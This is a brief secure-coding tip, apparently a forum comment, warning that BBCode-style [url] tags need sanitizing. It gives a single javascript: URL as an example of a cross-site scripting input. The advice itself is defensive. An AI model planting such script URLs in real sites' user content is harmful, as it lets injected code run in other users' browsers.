If you need to allow users to enter formatted text, then you have to create some sort of code like BBCode. But make sure you check and sanitize the output or else you'll suffer from vulnerabilities like Bob. For example, if you have a [url] tag that enters a link, make sure users don't enter something like
javascript:alert("Hello");
Make sure they enter valid URL's.